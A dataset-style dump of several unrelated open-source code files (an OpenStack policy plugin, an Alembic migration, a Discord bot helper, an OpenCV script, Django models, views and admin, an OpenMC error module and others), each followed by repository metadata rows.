return [subnet.subnet_id for subnet in ptg_db.subnets]
def _set_network_for_l2_policy(self, context, l2p_id, network_id):
with context.session.begin(subtransactions=True):
l2p_db = self._get_l2_policy(context, l2p_id)
l2p_db.network_id = network_id
def _add_router_to_l3_policy(self, context, l3p_id, router_id):
with context.session.begin(subtransactions=True):
l3p_db = self._get_l3_policy(context, l3p_id)
assoc = L3PolicyRouterAssociation(l3_policy_id=l3p_id,
router_id=router_id)
l3p_db.routers.append(assoc)
return [router.router_id for router in l3p_db.routers]
def _set_subnet_to_es(self, context, es_id, subnet_id):
with context.session.begin(subtransactions=True):
es_db = self._get_external_segment(context, es_id)
es_db.subnet_id = subnet_id
def _update_ess_for_l3p(self, context, l3p_id, ess):
with context.session.begin(subtransactions=True):
l3p_db = self._get_l3_policy(context, l3p_id)
self._set_ess_for_l3p(context, l3p_db, ess)
def _get_l3p_ptgs(self, context, l3p_id):
return super(GroupPolicyMappingDbPlugin, self)._get_l3p_ptgs(
context, l3p_id, l3p_klass=L3PolicyMapping,
ptg_klass=PolicyTargetGroupMapping, l2p_klass=L2PolicyMapping)
@log.log
def create_policy_target(self, context, policy_target):
pt = policy_target['policy_target']
tenant_id = self._get_tenant_id_for_create(context, pt)
with context.session.begin(subtransactions=True):
pt_db = PolicyTargetMapping(id=uuidutils.generate_uuid(),
tenant_id=tenant_id,
name=pt['name'],
description=pt['description'],
policy_target_group_id=
pt['policy_target_group_id'],
port_id=pt['port_id'])
context.session.add(pt_db)
return self._make_policy_target_dict(pt_db)
@log.log
def get_policy_targets(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'policy_target', limit,
marker)
return self._get_collection(context, PolicyTargetMapping,
self._make_policy_target_dict,
filters=filters, fields=fields,
sorts=sorts, limit=limit,
marker_obj=marker_obj,
page_reverse=page_reverse)
@log.log
def create_policy_target_group(self, context, policy_target_group):
ptg = policy_target_group['policy_target_group']
tenant_id = self._get_tenant_id_for_create(context, ptg)
with context.session.begin(subtransactions=True):
if ptg['service_management']:
self._validate_service_management_ptg(context, tenant_id)
ptg_db = PolicyTargetGroupMapping(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
name=ptg['name'], description=ptg['description'],
l2_policy_id=ptg['l2_policy_id'],
network_service_policy_id=ptg['network_service_policy_id'],
shared=ptg.get('shared', False),
service_management=ptg.get('service_management', False))
context.session.add(ptg_db)
if 'subnets' in ptg:
for subnet in ptg['subnets']:
assoc = PTGToSubnetAssociation(
policy_target_group_id=ptg_db.id,
subnet_id=subnet
)
ptg_db.subnets.append(assoc)
self._process_policy_rule_sets_for_ptg(context, ptg_db, ptg)
return self._make_policy_target_group_dict(ptg_db)
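    # Illustrative request body for create_policy_target_group (editorial
    # sketch, not part of the original module; the keys mirror the reads above
    # and every value is a placeholder):
    #
    #     {'policy_target_group': {
    #         'name': 'web-tier', 'description': '',
    #         'l2_policy_id': '<l2p-uuid>', 'network_service_policy_id': None,
    #         'shared': False, 'service_management': False,
    #         'subnets': ['<subnet-uuid>']}}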
@log.log
def update_policy_target_group(self, context, policy_target_group_id,
policy_target_group):
ptg = policy_target_group['policy_target_group']
with context.session.begin(subtransactions=True):
ptg_db = self._get_policy_target_group(
context, policy_target_group_id)
self._process_policy_rule_sets_for_ptg(context, ptg_db, ptg)
if 'subnets' in ptg:
# Add/remove associations for changes in subnets.
new_subnets = set(ptg['subnets'])
old_subnets = set(subnet.subnet_id
for subnet in ptg_db.subnets)
for subnet in new_subnets - old_subnets:
assoc = PTGToSubnetAssociation(
policy_target_group_id=policy_target_group_id,
subnet_id=subnet)
ptg_db.subnets.append(assoc)
for subnet in old_subnets - new_subnets:
assoc = (
context.session.query(
PTGToSubnetAssociation).filter_by(
policy_target_group_id=policy_target_group_id,
subnet_id=subnet).one())
ptg_db.subnets.remove(assoc)
context.session.delete(assoc)
# Don't update ptg_db.subnets with subnet IDs.
del ptg['subnets']
ptg_db.update(ptg)
return self._make_policy_target_group_dict(ptg_db)
@log.log
def create_l2_policy(self, context, l2_policy):
l2p = l2_policy['l2_policy']
tenant_id = self._get_tenant_id_for_create(context, l2p)
with context.session.begin(subtransactions=True):
l2p_db = L2PolicyMapping(id=uuidutils.generate_uuid(),
tenant_id=tenant_id,
name=l2p['name'],
description=l2p['description'],
l3_policy_id=l2p['l3_policy_id'],
network_id=l2p['network_id'],
shared=l2p.get('shared', False))
context.session.add(l2p_db)
return self._make_l2_policy_dict(l2p_db)
@log.log
def get_l2_policies(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'l2_policy', limit,
marker)
return self._get_collection(context, L2PolicyMapping,
self._make_l2_policy_dict,
filters=filters, fields=fields,
sorts=sorts, limit=limit,
marker_obj=marker_obj,
page_reverse=page_reverse)
@log.log
def create_l3_policy(self, context, l3_policy):
l3p = l3_policy['l3_policy']
self.validate_ip_pool(l3p.get('ip_pool', None), l3p['ip_version'])
tenant_id = self._get_tenant_id_for_create(context, l3p)
self.validate_subnet_prefix_length(l3p['ip_version'],
l3p['subnet_prefix_length'],
l3p.get('ip_pool', None))
with context.session.begin(subtransactions=True):
l3p_db = L3PolicyMapping(id=uuidutils.generate_uuid(),
tenant_id=tenant_id,
name=l3p['name'],
ip_version=l3p['ip_version'],
ip_pool=l3p['ip_pool'],
subnet_prefix_length=
l3p['subnet_prefix_length'],
description=l3p['description'],
shared=l3p.get('shared', False))
if 'routers' in l3p:
for router in l3p['routers']:
assoc = L3PolicyRouterAssociation(
l3_policy_id=l3p_db.id,
router_id=router
)
l3p_db.routers.append(assoc)
if 'external_segments' in l3p:
self._set_ess_for_l3p(context, l3p_db,
l3p['external_segments'])
context.session.add(l3p_db)
return self._make_l3_policy_dict(l3p_db)
@log.log
def update_l3_policy(self, context, l3_policy_id, l3_policy):
l3p = l3_policy['l3_policy']
with context.session.begin(subtransactions=True):
l3p_db = self._get_l3_policy(context, l3_policy_id)
if 'subnet_prefix_length' in l3p:
self.validate_subnet_prefix_length(l3p_db.ip_version,
l3p['subnet_prefix_length'],
l3p_db.ip_pool)
if 'routers' in l3p:
# Add/remove associations for changes in routers.
new_routers = set(l3p['routers'])
old_routers = set(router.router_id
for router in l3p_db.routers)
for router in new_routers - old_routers:
assoc = L3PolicyRouterAssociation(
l3_policy_id=l3_policy_id, router_id=router)
l3p_db.routers.append(assoc)
for router in old_routers - new_routers:
assoc = (context.session.query(L3PolicyRouterAssociation).
filter_by(l3_policy_id=l3_policy_id,
router_id=router).
one())
l3p_db.routers.remove(assoc)
context.session.delete(assoc)
# Don't update l3p_db.routers with router IDs.
del l3p['routers']
if 'external_segments' in l3p:
self._set_ess_for_l3p(context, l3p_db,
l3p['external_segments'])
del l3p['external_segments']
l3p_db.update(l3p)
return self._make_l3_policy_dict(l3p_db)
@log.log
def create_external_segment(self, context, external_segment):
es = external_segment['external_segment']
tenant_id = self._get_tenant_id_for_create(context, es)
with context.session.begin(subtransactions=True):
es_db = ExternalSegmentMapping(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
name=es['name'], description=es['description'],
shared=es.get('shared', False), ip_version=es['ip_version'],
cidr=es['cidr'],
port_address_translation=es['port_address_translation'],
subnet_id=es['subnet_id'])
context.session.add(es_db)
if 'external_routes' in es:
self._process_segment_ers(context, es_db, es)
return self._make_external_segment_dict(es_db)
@log.log
def get_external_segments(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'external_segment', limit,
marker)
return self._get_collection(context, ExternalSegmentMapping,
self._make_external_segment_dict,
filters=filters, fields=fields,
sorts=sorts, limit=limit,
marker_obj=marker_obj,
page_reverse=page_reverse)
|
apache-2.0
| 7,347,120,841,103,044,000
| 47.142105
| 79
| 0.552586
| false
| 3.970914
| false
| false
| false
|
uwcirg/true_nth_usa_portal
|
portal/migrations/versions/4456ad5faf86_.py
|
1
|
2041
|
"""empty message
Revision ID: 4456ad5faf86
Revises: 521aa70e0617
Create Date: 2015-09-03 19:40:53.744703
"""
# revision identifiers, used by Alembic.
revision = '4456ad5faf86'
down_revision = '521aa70e0617'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('user_roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(
['role_id'], ['roles.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(
['user_id'], ['users.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.add_column(u'users', sa.Column(
'confirmed_at', sa.DateTime(), nullable=True))
op.add_column(u'users', sa.Column('is_active', sa.Boolean(),
server_default='1', nullable=False))
op.add_column(u'users', sa.Column(
'password', sa.String(length=255), nullable=True))
op.add_column(u'users', sa.Column('reset_password_token',
sa.String(length=100), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column(u'users', 'reset_password_token')
op.drop_column(u'users', 'password')
op.drop_column(u'users', 'is_active')
op.drop_column(u'users', 'confirmed_at')
op.drop_table('user_roles')
op.drop_table('roles')
### end Alembic commands ###
|
bsd-3-clause
| 5,831,843,187,538,724,000
| 36.796296
| 76
| 0.55757
| false
| 3.829268
| false
| false
| false
|
Sult/evetool
|
populate/misc.py
|
1
|
1848
|
import eveapi
from apies.models import CallGroup, Call, Api
from characters.models import RefType
api = eveapi.EVEAPIConnection()
data = api.API.CallList()
def call_groups():
for group in data.callGroups:
try:
CallGroup.objects.create(
groupid=group.groupID,
name=group.name,
description=group.description,
)
except:
print "You stupid"
def calls():
for call in data.calls:
if call.accessMask == 8388608:
            # no need for limited character info, or full access, or none
continue
try:
Call.objects.create(
accessmask=call.accessMask,
accounttype=call.type,
name=call.name,
callgroup=CallGroup.objects.get(groupid=call.groupID),
description=call.description,
)
except:
print "Some shit didnt work dude"
# extra = []
# for call in extra:
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CHARACTER,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CORPORATION,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
def reftypes():
for ref in api.eve.RefTypes().refTypes:
try:
RefType.objects.create(
reftypeid=ref.refTypeID,
reftypename=ref.refTypeName,
)
except:
"You fucked up mate"
call_groups()
calls()
reftypes()
|
mit
| 1,425,303,682,853,979,000
| 26.58209
| 70
| 0.551407
| false
| 3.948718
| false
| false
| false
|
EJH2/ViralBot-Discord
|
bot/utils/over.py
|
1
|
7167
|
# coding=utf-8
"""Overrides for Discord.py classes"""
import contextlib
import inspect
import io
import itertools
import re
import discord
from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command
from bot.utils import polr, privatebin
from bot.utils.args import ArgParseConverter as ArgPC
def create_help(cmd, parser):
"""Creates an updated usage for the help command"""
default = cmd.params['args'].default
if cmd.signature.split("[")[-1] == f"args={default}]" if default else "args]":
sio = io.StringIO()
with contextlib.redirect_stdout(sio):
parser.print_help()
sio.seek(0)
s = sio.read()
# Strip the filename and trailing newline from help text
arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]
k = cmd.qualified_name
spt = len(k.split())
# Remove a duplicate command name + leading arguments
split_sig = cmd.signature.split()[spt:]
return "[".join((" ".join(split_sig)).split("[")[:-1]) + arg_part
return cmd.usage
class HelpFormatter(HelpF):
"""Custom override for the default help command"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._paginator = None
async def format(self):
"""Handles the actual behaviour involved with formatting.
To change the behaviour, this method should be overridden.
Returns
--------
list
A paginated output of the help command.
"""
self._paginator = Paginator()
# we need a padding of ~80 or so
description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)
if description:
# <description> portion
self._paginator.add_line(description, empty=True)
if isinstance(self.command, Command):
# <signature portion>
if self.command.params.get("args", None) and type(self.command.params['args'].annotation) == ArgPC:
self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser)
signature = self.get_command_signature()
self._paginator.add_line(signature, empty=True)
# <long doc> section
if self.command.help:
self._paginator.add_line(self.command.help, empty=True)
# end it here if it's just a regular command
if not self.has_subcommands():
self._paginator.close_page()
return self._paginator.pages
max_width = self.max_name_size
def category(tup):
"""Splits the help command into categories for easier readability"""
cog = tup[1].cog_name
# we insert the zero width space there to give it approximate
# last place sorting position.
return cog + ':' if cog is not None else '\u200bNo Category:'
filtered = await self.filter_command_list()
if self.is_bot():
data = sorted(filtered, key=category)
for category, commands in itertools.groupby(data, key=category):
# there simply is no prettier way of doing this.
commands = sorted(commands)
if len(commands) > 0:
self._paginator.add_line(category)
self._add_subcommands_to_page(max_width, commands)
else:
filtered = sorted(filtered)
if filtered:
self._paginator.add_line('Commands:')
self._add_subcommands_to_page(max_width, filtered)
# add the ending note
self._paginator.add_line()
ending_note = self.get_ending_note()
self._paginator.add_line(ending_note)
return self._paginator.pages
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ".")
async def _default_help_command(ctx, *commands: str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = await bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
pages = await bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.all_commands.get(key)
if command is None:
await destination.send(bot.command_not_found.format(key))
return
except AttributeError:
await destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = await bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(len, pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
try:
await destination.send(page)
except discord.Forbidden:
destination = ctx.message.channel
await destination.send(page)
old_send = discord.abc.Messageable.send
async def send(self, content=None, **kwargs):
"""Overrides default send method in order to create a paste if the response is more than 2000 characters"""
if content is not None and any(x in str(content) for x in ["@everyone", "@here"]):
content = content.replace("@everyone", "@\u0435veryone").replace("@here", "@h\u0435re")
if content is not None and len(str(content)) > 2000:
if content.startswith("```py"):
content = "\n".join(content.split("\n")[1:-1])
paste = await privatebin.upload(content, expires="15min", server=self.bot.priv)
if self.bot.polr:
paste = await polr.shorten(paste, **self.bot.polr)
return await old_send(self, f"Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!"
f"\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!",
**kwargs)
else:
return await old_send(self, content, **kwargs)
|
gpl-3.0
| 2,864,970,659,438,636,000
| 35.380711
| 120
| 0.596205
| false
| 4.090753
| false
| false
| false
|
makelove/OpenCV-Python-Tutorial
|
ch05-视频/5.VideoPlay.py
|
1
|
1329
|
import numpy as np
import cv2
cap = cv2.VideoCapture('../data/vtest.avi')
# cap = cv2.VideoCapture('output.avi')
# cap = cv2.VideoCapture('Minions_banana.mp4')
# Frame rate
fps = cap.get(cv2.CAP_PROP_FPS) # 25.0
print("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))
# Total number of frames
num_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
print('Total frames:', num_frames)
#
frame_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
print('Height:', frame_height, 'Width:', frame_width)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES)  # frame 0
print('Current frame:', FRAME_NOW)  # current frame: 0.0
# Seek to a specific frame; this works for video files but not for a live camera
frame_no = 121
cap.set(cv2.CAP_PROP_POS_FRAMES, frame_no)  # Where frame_no is the frame you want
ret, frame = cap.read() # Read the frame
cv2.imshow('frame_no'+str(frame_no), frame)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES)
print('Current frame:', FRAME_NOW)  # current frame: 122.0
while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        # stop when the video runs out of frames; cvtColor would fail on None
        break
    FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES)  # current frame number
    print('Current frame:', FRAME_NOW)
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('frame', gray)
key = cv2.waitKey(1)
if key == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
|
mit
| 7,165,087,056,115,826,000
| 25.733333
| 78
| 0.666667
| false
| 2.110526
| false
| false
| false
|
ziima/pyvmd
|
pyvmd/tests/test_analyzer.py
|
1
|
2785
|
"""
Tests for trajectory analysis utilities.
"""
import VMD
from mock import sentinel
from pyvmd.analyzer import Analyzer
from pyvmd.molecules import Molecule
from .utils import data, PyvmdTestCase
class TestAnalyzer(PyvmdTestCase):
"""
Test `Analyzer` class.
"""
def setUp(self):
self.mol = Molecule.create()
self.mol.load(data('water.psf'))
# Storage for callback data
self.coords = []
self.frames = []
def test_analyze_callback_args(self):
# Test callback is called with extra arguments
steps = []
def callback(step, *args, **kwargs):
self.assertEqual(step.molecule, self.mol)
self.assertEqual(args, (sentinel.arg1, sentinel.arg2))
self.assertEqual(kwargs, {'key': sentinel.value, 'another': sentinel.junk})
steps.append(step.frame)
analyzer = Analyzer(self.mol, [data('water.1.dcd')])
analyzer.add_callback(callback, sentinel.arg1, sentinel.arg2, key=sentinel.value, another=sentinel.junk)
analyzer.analyze()
self.assertEqual(steps, range(12))
def _get_status(self, status):
# Callback to collect status data
self.frames.append(status.frame)
def _get_x(self, status):
# Callback to collect data
self.coords.append(VMD.atomsel.atomsel('index 0', molid=status.molecule.molid).get('x')[0])
def test_analyze(self):
# Test analyzer works correctly with default parameters
analyzer = Analyzer(self.mol, [data('water.1.dcd'), data('water.2.dcd')])
analyzer.add_callback(self._get_status)
analyzer.add_callback(self._get_x)
analyzer.analyze()
result = [-1.4911567, -1.4851371, -1.4858487, -1.4773947, -1.4746015, -1.4673382, -1.4535547, -1.4307435,
-1.4120502, -1.3853478, -1.3674825, -1.3421925, -1.3177859, -1.2816998, -1.2579591, -1.2262495,
-1.2036057, -1.1834533, -1.174916, -1.1693807, -1.1705244, -1.1722997, -1.1759951, -1.175245]
self.assertAlmostEqualSeqs(self.coords, result)
self.assertEqual(self.frames, range(24))
def test_analyze_params(self):
# Test load every other frame, all 12 at once
self.coords = []
self.frames = []
analyzer = Analyzer(self.mol, [data('water.1.dcd'), data('water.2.dcd')], step=2, chunk=12)
analyzer.add_callback(self._get_status)
analyzer.add_callback(self._get_x)
analyzer.analyze()
result = [-1.4911567, -1.4858487, -1.4746015, -1.4535547, -1.4120502, -1.3674825, -1.3177859, -1.2579591,
-1.2036057, -1.174916, -1.1705244, -1.1759951]
self.assertAlmostEqualSeqs(self.coords, result)
self.assertEqual(self.frames, range(12))
|
gpl-3.0
| 6,988,987,339,418,595,000
| 38.225352
| 113
| 0.627289
| false
| 3.234611
| true
| false
| false
|
mercycorps/tola
|
htdocs/silo/serializers.py
|
1
|
1231
|
from django.forms import widgets
from rest_framework import serializers
from silo.models import Silo, Read, ReadType, LabelValueStore, Tag
from django.contrib.auth.models import User
import json
class SiloSerializer(serializers.HyperlinkedModelSerializer):
data = serializers.SerializerMethodField()
class Meta:
model = Silo
        fields = ('owner', 'name', 'reads', 'description', 'create_date', 'id', 'data', 'shared', 'tags', 'public')
        depth = 1
def get_data(self, obj):
link = "/api/silo/" + str(obj.id) + "/data/"
return (self.context['request'].build_absolute_uri(link))
class TagSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Tag
fields = ('name', 'owner')
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = User
fields = ('url', 'username', 'email', 'is_staff')
class ReadSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Read
fields = ('owner', 'type', 'read_name', 'read_url')
class ReadTypeSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ReadType
fields = ( 'read_type', 'description')
|
gpl-2.0
| -2,326,723,832,163,240,000
| 29.04878
| 112
| 0.671812
| false
| 4.036066
| false
| false
| false
|
eighilaza/bouraka
|
bouraka-django/bouraka/views.py
|
1
|
1815
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.template import RequestContext, loader
from news.models import News
from slides.models import Slide
from django.http import HttpResponseRedirect
def home(request):
latest_news_list = News.objects.order_by('-publication_date')[:4]
try:
slide = Slide.objects.get(title='home')
except Slide.DoesNotExist:
slide = None
template = loader.get_template('bouraka/home.html')
context = {
'latest_news_list': latest_news_list,
'slide': slide,
}
return render(request, 'bouraka/home.html', context)
def gallery(request):
return render(request, 'bouraka/gallery.html')
def history(request):
return render(request, 'bouraka/history.html')
def team(request):
return render(request, 'bouraka/team.html')
def shell(request):
return render(request, 'bouraka/shell.html')
def educeco(request):
return render(request, 'bouraka/educeco.html')
def michelin(request):
return render(request, 'bouraka/michelin.html')
def futur(request):
return render(request, 'bouraka/futur.html')
def envol(request):
return render(request, 'bouraka/envol.html')
def epic(request):
return render(request, 'bouraka/epic.html')
def orca(request):
return render(request, 'bouraka/orca.html')
def elec(request):
return render(request, 'bouraka/elec.html')
def roues(request):
return render(request, 'bouraka/roues.html')
def moteur(request):
return render(request, 'bouraka/moteur.html')
def simulateur(request):
return render(request, 'bouraka/simulateur.html')
def accomplishments(request):
return render(request, 'bouraka/accomplishments.html')
def contacts(request):
return render(request, 'bouraka/contacts.html')
|
lgpl-3.0
| -63,468,116,221,537,944
| 33.903846
| 69
| 0.722865
| false
| 3.336397
| false
| false
| false
|
beakman/caquitv
|
external_apps/djangoratings/models.py
|
1
|
2158
|
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth.models import User
import datetime
from managers import VoteManager
class Vote(models.Model):
content_type = models.ForeignKey(ContentType, related_name="votes")
object_id = models.PositiveIntegerField()
key = models.CharField(max_length=32)
score = models.IntegerField()
user = models.ForeignKey(User, blank=True, null=True, related_name="votes")
ip_address = models.IPAddressField()
date_added = models.DateTimeField(default=datetime.datetime.now, editable=False)
date_changed = models.DateTimeField(default=datetime.datetime.now, editable=False)
objects = VoteManager()
content_object = generic.GenericForeignKey()
class Meta:
unique_together = (('content_type', 'object_id', 'key', 'user', 'ip_address'))
def __unicode__(self):
return "%s voted %s on %s" % (self.user_display, self.score, self.content_object)
def save(self, *args, **kwargs):
self.date_changed = datetime.datetime.now()
super(Vote, self).save(*args, **kwargs)
def user_display(self):
if self.user:
return "%s (%s)" % (self.user.username, self.ip_address)
return self.ip_address
user_display = property(user_display)
def partial_ip_address(self):
ip = self.ip_address.split('.')
ip[-1] = 'xxx'
return '.'.join(ip)
partial_ip_address = property(partial_ip_address)
class Score(models.Model):
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
key = models.CharField(max_length=32)
score = models.IntegerField()
votes = models.PositiveIntegerField()
content_object = generic.GenericForeignKey()
class Meta:
unique_together = (('content_type', 'object_id', 'key'),)
def __unicode__(self):
return "%s scored %s with %s votes" % (self.content_object, self.score, self.votes)
|
agpl-3.0
| -277,736,686,817,290,900
| 35.576271
| 91
| 0.645042
| false
| 3.90942
| false
| false
| false
|
alexbiehl/SublimeLinter-stack-ghc
|
linter.py
|
1
|
1410
|
#
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Jon Surrell
# Copyright (c) 2013 Jon Surrell
#
# License: MIT
#
"""This module exports the Stack Ghc plugin class."""
from SublimeLinter.lint import Linter, util
from os.path import basename
class StackGhc(Linter):
"""Provides an interface to stack ghc."""
syntax = ('haskell', 'haskell-sublimehaskell', 'literate haskell')
cmd = ('stack', 'ghc', '--', '-fno-code', '-Wall', '-Wwarn', '-fno-helpful-errors')
regex = (
r'^(?P<filename>.+):'
r'(?P<line>\d+):(?P<col>\d+):'
r'\s+(?P<warning>Warning:\s+)?(?P<message>.+)$'
)
multiline = True
# No stdin
tempfile_suffix = {
'haskell': 'hs',
'haskell-sublimehaskell': 'hs',
'literate haskell': 'lhs'
}
# ghc writes errors to STDERR
error_stream = util.STREAM_STDERR
def split_match(self, match):
"""Override to ignore errors reported in imported files."""
match, line, col, error, warning, message, near = (
super().split_match(match)
)
match_filename = basename(match.groupdict()['filename'])
linted_filename = basename(self.filename)
if match_filename != linted_filename:
return None, None, None, None, None, '', None
return match, line, col, error, warning, message, near
|
mit
| -9,104,684,087,554,022,000
| 26.115385
| 87
| 0.600709
| false
| 3.414044
| false
| false
| false
|
walshjon/openmc
|
openmc/capi/error.py
|
1
|
1950
|
from ctypes import c_int, c_char
from warnings import warn
from . import _dll
class OpenMCError(Exception):
"""Root exception class for OpenMC."""
class GeometryError(OpenMCError):
"""Geometry-related error"""
class InvalidIDError(OpenMCError):
"""Use of an ID that is invalid."""
class AllocationError(OpenMCError):
"""Error related to memory allocation."""
class OutOfBoundsError(OpenMCError):
"""Index in array out of bounds."""
class DataError(OpenMCError):
"""Error relating to nuclear data."""
class PhysicsError(OpenMCError):
"""Error relating to performing physics."""
class InvalidArgumentError(OpenMCError):
"""Argument passed was invalid."""
class InvalidTypeError(OpenMCError):
"""Tried to perform an operation on the wrong type."""
def _error_handler(err, func, args):
"""Raise exception according to error code."""
# Get error code corresponding to global constant.
def errcode(s):
return c_int.in_dll(_dll, s).value
# Get error message set by OpenMC library
errmsg = (c_char*256).in_dll(_dll, 'openmc_err_msg')
msg = errmsg.value.decode()
# Raise exception type corresponding to error code
if err == errcode('e_allocate'):
raise AllocationError(msg)
elif err == errcode('e_out_of_bounds'):
raise OutOfBoundsError(msg)
elif err == errcode('e_invalid_argument'):
raise InvalidArgumentError(msg)
elif err == errcode('e_invalid_type'):
raise InvalidTypeError(msg)
if err == errcode('e_invalid_id'):
raise InvalidIDError(msg)
elif err == errcode('e_geometry'):
raise GeometryError(msg)
elif err == errcode('e_data'):
raise DataError(msg)
elif err == errcode('e_physics'):
raise PhysicsError(msg)
elif err == errcode('e_warning'):
warn(msg)
elif err < 0:
raise OpenMCError("Unknown error encountered (code {}).".format(err))
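# Illustrative wiring (editorial sketch, not part of the original module): the
# (err, func, args) signature above matches the ctypes ``errcheck`` protocol,
# so a hypothetical binding could route its return code through this handler:
#
#     _dll.openmc_init.restype = c_int      # function name is an assumption
#     _dll.openmc_init.errcheck = _error_handler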
|
mit
| 8,463,138,787,818,959,000
| 25.351351
| 77
| 0.663077
| false
| 3.931452
| false
| false
| false
|
vivaxy/algorithms
|
python/problems/validate_stack_sequences.py
|
1
|
1434
|
"""
https://leetcode.com/problems/validate-stack-sequences/
https://leetcode.com/submissions/detail/218117451/
"""
from typing import List
class Solution:
def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:
if pushed == popped:
return True
a = []
while len(pushed):
if len(a) == 0:
a.append(pushed.pop(0))
if popped[0] != a[-1]:
a.append(pushed.pop(0))
else:
popped.pop(0)
a.pop()
if len(a) != len(popped):
return False
while len(a):
if a.pop() != popped.pop(0):
return False
return True
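# Explanatory note (editorial, not in the original file): the loop above replays
# `pushed` onto the working stack `a`, greedily popping whenever the top of `a`
# equals the next expected element of `popped`; afterwards whatever remains on
# `a` must match the rest of `popped` in reverse push order.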
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.validateStackSequences(
[1, 2, 3, 4, 5],
[4, 5, 3, 2, 1]), True)
self.assertEqual(solution.validateStackSequences(
[1, 2, 3, 4, 5],
[4, 3, 5, 1, 2]), False)
self.assertEqual(solution.validateStackSequences(
[],
[]), True)
self.assertEqual(solution.validateStackSequences(
[1, 0],
[1, 0]), True)
self.assertEqual(solution.validateStackSequences(
[0, 2, 1],
[0, 1, 2]), True)
if __name__ == '__main__':
unittest.main()
|
mit
| 2,056,916,776,801,924,600
| 25.072727
| 83
| 0.505579
| false
| 3.695876
| true
| false
| false
|
ojousima/asylum
|
project/ndaparser/admin.py
|
1
|
2753
|
from django.contrib import admin
from django.core.exceptions import PermissionDenied, ImproperlyConfigured
from django.conf.urls import url
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.shortcuts import get_object_or_404, render
from django.utils.text import capfirst
from django.conf import settings
from .views import NordeaUploadView
from creditor.admin import TransactionAdmin
from creditor.handlers import AbstractTransaction
from asylum.utils import get_handler_instance
class NordeaUploadMixin(object):
nda_change_list_template = "ndaparser/admin/change_list.html"
view_class = NordeaUploadView
def get_urls(self):
"""Returns the additional urls used by the uploader."""
urls = super().get_urls()
admin_site = self.admin_site
opts = self.model._meta
info = opts.app_label, opts.model_name,
my_urls = [
url("^nordea/upload/$", admin_site.admin_view(self.upload_view), name='%s_%s_ndaupload' % info),
]
return my_urls + urls
def upload_view(self, request, extra_context=None):
"""Displays a form that can upload transactions form a Nordea "NDA" transaction file."""
# The revisionform view will check for change permission (via changeform_view),
# but we also need to check for add permissions here.
